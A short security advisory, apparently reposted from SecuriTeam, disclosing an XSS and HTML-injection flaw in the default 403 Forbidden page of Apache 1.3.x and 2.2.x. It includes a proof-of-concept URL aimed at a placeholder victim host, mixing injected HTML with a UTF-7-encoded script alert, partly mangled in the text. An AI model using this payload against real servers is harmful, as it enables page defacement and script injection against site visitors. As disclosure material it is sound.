A vulnerability in the Apache web server allows an attacker to inject an XSS to any Apache server that use the Forbidden 403 default page .

Vulnerable Systems:
* Apache version 2.2.x
* Apache version 1.3.x

After injecting this string:
http://www.victim.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5Ma
Z1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY
7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xcscriptalert('xss')
-/script--//--

You will get a Forbidden 403 error message with an XSS alert. This string is combined from HTML Injection and a XSS string coded in UTF-7.

This is only a PoC and because of that the browser should be in auto select mode of encoding so it could use the UTF-7 encoding.

Additional Information:
The information has been provided by Yaniv Miron aka "Lament".

http://www.securiteam.com/unixfocus/5TP0B00OAM.html